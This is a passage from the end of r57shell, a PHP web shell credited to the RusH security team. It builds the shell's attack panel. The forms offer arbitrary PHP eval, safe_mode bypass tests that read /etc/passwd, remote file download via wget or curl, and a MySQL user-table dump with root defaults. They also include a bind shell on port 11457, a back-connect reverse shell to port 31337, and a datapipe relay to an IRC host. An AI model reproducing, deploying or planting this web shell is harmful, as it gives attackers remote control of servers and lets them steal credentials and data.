1678//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1679/* php eval form */
1680echo "<form name=php method=post>";
1681echo $table_up1; echo $lang[$language.'_text32']; echo $table_up2;
1682echo $font;
1683echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
1684echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
1685echo "</textarea>";
1686echo "<input type=hidden name=dir size=85 value=".$dir.">";
1687echo "<input type=hidden name=cmd size=85 value=php_eval>";
1688echo "<br>".ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
1689echo "</font>";
1690echo $table_end1;
1691echo "</form>";
1692//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1693/* php safe_mode break test 1 form */
1694if($safe_mode&&$curl_on)
1695{
1696echo "<form name=test1 method=post>";
1697echo $table_up1; echo $lang[$language.'_text33']; echo $table_up2;
1698echo $font;
1699echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
1700echo "<input type=text name=test1_file size=85 value=";
1701echo (!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"));
1702echo ">";
1703echo "<input type=hidden name=dir size=85 value=".$dir.">";
1704echo "<input type=hidden name=cmd size=85 value=test1>";
1705echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
1706echo "</font>";
1707echo $table_end1;
1708echo "</form>";
1709}
1710//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1711/* php safe_mode break test 2 form */
1712if($safe_mode)
1713{
1714echo "<form name=test2 method=post>";
1715echo $table_up1; echo $lang[$language.'_text34']; echo $table_up2;
1716echo $font;
1717echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
1718echo "<input type=text name=test2_file size=85 value=";
1719echo (!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"));
1720echo ">";
1721echo "<input type=hidden name=dir size=85 value=".$dir.">";
1722echo "<input type=hidden name=cmd size=85 value=test2>";
1723echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
1724echo "</font>";
1725echo $table_end1;
1726echo "</form>";
1727}
1728//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1729/* php safe_mode break test 3 form */
1730if($safe_mode&&$mysql_on)
1731{
1732echo "<form name=test3 method=post>";
1733echo $table_up1; echo $lang[$language.'_text35']; echo $table_up2;
1734echo $font;
1735echo "<b>".ws(27).$lang[$language.'_text36'].$arrow.ws(4)."</b>";
1736echo "<input type=text name=test3_md size=15 value=";
1737echo (!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"));
1738echo ">";
1739echo "<b>".ws(13).$lang[$language.'_text37'].$arrow.ws(4)."</b>";
1740echo "<input type=text name=test3_ml size=15 value=";
1741echo (!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"));
1742echo ">";
1743echo "<b>".ws(12).$lang[$language.'_text38'].$arrow.ws(4)."</b>";
1744echo "<input type=text name=test3_mp size=15 value=";
1745echo (!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"));
1746echo ">";
1747echo "<br><b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
1748echo "<input type=text name=test3_file size=85 value=";
1749echo (!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"));
1750echo ">";
1751echo "<input type=hidden name=dir size=85 value=".$dir.">";
1752echo "<input type=hidden name=cmd size=85 value=test3>";
1753echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
1754echo "</font>";
1755echo $table_end1;
1756echo "</form>";
1757}
1758//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1759/* file upload form */
1760echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
1761echo $table_up1; echo $lang[$language.'_text5']; echo $table_up2;
1762echo $font;
1763echo "<b>".ws(7).$lang[$language.'_text6'].$arrow.ws(4)."</b>";
1764echo "<input type=file name=userfile size=85> ";
1765echo "<br><b>".ws(20).$lang[$language.'_text21'].$arrow.ws(4)."</b>";
1766echo "<input type=checkbox name=nf1 value=1 id=nf1><input type=text name=new_name size=82>".ws(1);
1767echo "<input type=hidden name=dir value=".$dir.">";
1768echo "<input type=submit name=submit value=\" ".$lang[$language.'_butt2']." \">";
1769echo "</font>";
1770echo $table_end1;
1771echo "</form>";
1772//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1773/* file upload from remote host form */
1774if(!$safe_mode&&!$windows){
1775echo "<form name=remote_upload method=POST>";
1776echo $table_up1; echo $lang[$language.'_text15']; echo $table_up2;
1777echo $font;
1778echo "<b>".ws(13).$lang[$language.'_text16'].$arrow.ws(4)."</b>";
1779echo "<select size=\"1\" name=\"with\">";
1780echo "<option value=\"wget\">wget</option>";
1781echo "<option value=\"fetch\">fetch</option>";
1782echo "<option value=\"lynx\">lynx</option>";
1783echo "<option value=\"links\">links</option>";
1784echo "<option value=\"curl\">curl</option>";
1785echo "<option value=\"GET\">GET</option>";
1786echo "</select> <br>";
1787echo "<b>".ws(7).$lang[$language.'_text17'].$arrow.ws(4)."</b>";
1788echo "<input type=text name=rem_file value=http:// size=85>".ws(2)."<br>";
1789echo "<b>".ws(7).$lang[$language.'_text18'].$arrow.ws(4)."</b>";
1790echo "<input type=text name=loc_file size=85 value=".$dir.">".ws(1);
1791echo "<input type=hidden name=dir value=".$dir.">";
1792echo "<input type=submit name=submit value=\" ".$lang[$language.'_butt2']." \">";
1793echo "</font>";
1794echo $table_end1;
1795echo "</form>";
1796}
1797//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1798/* mysql dump form */
1799if($mysql_on)
1800{
1801echo "<form name=mysql_dump method=post>";
1802echo $table_up1; echo $lang[$language.'_text40']; echo $table_up2;
1803echo $font;
1804echo "<b>".ws(27).$lang[$language.'_text36'].$arrow.ws(4)."</b>";
1805echo "<input type=text name=mysql_db size=15 value=";
1806echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
1807echo ">";
1808echo "<b>".ws(4).$lang[$language.'_text39'].$arrow.ws(4)."</b>";
1809echo "<input type=text name=mysql_tbl size=15 value=";
1810echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
1811echo ">";
1812echo "<b>".ws(4).$lang[$language.'_text37'].$arrow.ws(4)."</b>";
1813echo "<input type=text name=mysql_l size=15 value=";
1814echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
1815echo ">";
1816echo "<b>".ws(4).$lang[$language.'_text38'].$arrow.ws(1)."</b>";
1817echo "<input type=text name=mysql_p size=15 value=";
1818echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
1819echo ">";
1820echo "<input type=hidden name=dir size=85 value=".$dir.">";
1821echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
1822echo "<br><b>".ws(4).$lang[$language.'_text41'].$arrow.ws(1)."</b>";
1823echo "<input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
1824echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
1825echo ">".ws(1);
1826echo ws(4)."<input type=submit name=submit value=\" ".$lang[$language.'_butt9']." \">";
1827echo "</font>";
1828echo $table_end1;
1829echo "</form>";
1830}
1831//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1832/* port bind form */
1833if(!$safe_mode&&!$windows){
1834echo "<form name=bind method=POST>";
1835echo $table_up1; echo $lang[$language.'_text9']; echo $table_up2;
1836echo $font;
1837echo "<b>".ws(14).$lang[$language.'_text10'].$arrow.ws(4)."</b>";
1838echo "<input type=text name=port size=15 value=11457>".ws(1);
1839echo "<b>".ws(6).$lang[$language.'_text11'].$arrow.ws(4)."</b>";
1840echo "<input type=text name=bind_pass size=15 value=r57>".ws(1);
1841echo "<b>".ws(6).$lang[$language.'_text20'].$arrow.ws(1)."</b>";
1842echo "<select size=\"1\" name=\"use\">";
1843echo "<option value=\"Perl\">Perl</option>";
1844echo "<option value=\"C\">C</option>";
1845echo "</select> ";
1846echo "<input type=hidden name=dir value=".$dir.">";
1847echo ws(6)."<input type=submit name=submit value=\" ".$lang[$language.'_butt3']." \">";
1848echo "</font>";
1849echo $table_end1;
1850echo "</form>";
1851}
1852//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1853/* back connect form */
1854if(!$safe_mode&&!$windows){
1855echo "<form name=back method=POST>";
1856echo $table_up1; echo $lang[$language.'_text12']; echo $table_up2;
1857echo $font;
1858echo "<b>".ws(22).$lang[$language.'_text13'].$arrow.ws(4)."</b>";
1859echo "<input type=text name=ip size=15 value=";
1860echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"));
1861echo ">".ws(1);
1862echo "<b>".ws(37).$lang[$language.'_text14'].$arrow.ws(4)."</b>";
1863echo "<input type=text name=port size=15 value=31337> ";
1864echo "<b>".ws(6).$lang[$language.'_text20'].$arrow.ws(1)."</b>";
1865echo "<select size=\"1\" name=\"use\">";
1866echo "<option value=\"Perl\">Perl</option>";
1867echo "<option value=\"C\">C</option>";
1868echo "</select> ";
1869echo "<input type=hidden name=dir value=".$dir.">";
1870echo ws(6)."<input type=submit name=submit value=\" ".$lang[$language.'_butt4']." \">";
1871echo "</font>";
1872echo $table_end1;
1873echo "</form>";
1874}
1875//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1876/* datapipe */
1877if(!$safe_mode&&!$windows){
1878echo "<div align=center><form name=datapipe method=POST>";
1879echo $table_up1; echo $lang[$language.'_text22']; echo $table_up2;
1880echo $font;
1881echo "<b>".ws(2).$lang[$language.'_text23'].$arrow.ws(1)."</b>";
1882echo "<input type=text name=local_port size=5 value=\"31337\">".ws(1);
1883echo "<b>".ws(2).$lang[$language.'_text24'].$arrow.ws(1)."</b>";
1884echo "<input type=text name=remote_host size=15 value=\"irc.dalnet.ru\">".ws(1);
1885echo "<b>".ws(2).$lang[$language.'_text25'].$arrow.ws(1)."</b>";
1886echo "<input type=text name=remote_port size=5 value=\"6667\">".ws(1);
1887echo "<b>".ws(2).$lang[$language.'_text26'].$arrow.ws(1)."</b>";
1888echo "<select size=\"1\" name=\"use\">";
1889echo "<option value=\"Perl\">datapipe.pl</option>";
1890echo "<option value=\"C\">datapipe.c</option>";
1891echo "</select> ";
1892echo ws(2)."<input type=submit name=submit value=\" ".$lang[$language.'_butt5']." \">";
1893echo "<input type=hidden name=dir value=".$dir.">";
1894echo "</font>";
1895echo $table_end1;
1896echo "</form></div>";
1897}
1898//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1899/// end table
1900echo "</table>";
1901/* (c) */
1902echo $table_up3;
1903echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version ".$version." ]---o</b></font></div>";
1904echo "</td></tr></table>$f";
1905
1906/* -------------------------[ EOF ]------------------------- */
1907?>